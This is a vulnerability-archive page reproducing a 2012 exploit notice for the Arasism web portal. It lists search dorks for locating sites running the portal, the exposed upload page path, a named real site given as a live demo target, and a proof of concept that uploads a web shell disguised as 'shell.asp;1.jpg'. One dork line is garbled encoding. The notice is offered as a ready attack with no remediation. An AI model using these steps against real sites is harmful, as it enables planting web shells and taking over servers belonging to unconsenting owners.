Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28279
HistoryJul 11, 2012 - 12:00 a.m.

Arasism Remote Command Upload Vulnerability

2012-07-1100:00:00
vulners.com
22

########################################################################################

Exploit Title : Arasism Remote Command Upload Vulnerability

Author : Iranian Security & Research Team

Discovered By : Ehram.shahmohamadi

Home : sec-lab.ir

Contact : research [at] sec-lab [dot] ir

Portal Link : www.Arasism.Com

Security Risk : High

DorK : "Powered by Arasism.com"

OR : "Designed & Powered By Hadi Farzad"

OR : "Powered By : www.Arasism.Com"

OR : "ШСЗНн ж ЗМСЗ : еЗПн ЭСТЗП | ЃнФђЗгЗд жИ ЭСПЗ"

########################################################################################

Expl0iTs:

[TarGeT]/sysop/RTE_popup_file_atch.asp

Demo :

http://www.iritf.org.ir/sysop/RTE_popup_file_atch.asp

########################################################################################

POc : upload shell via shell.asp;1.jpg

########################################################################################

We are : K0242 | Nafsh | Ehram.shahmohamadi

Greetz : All sec-lab researchers

########################################################################################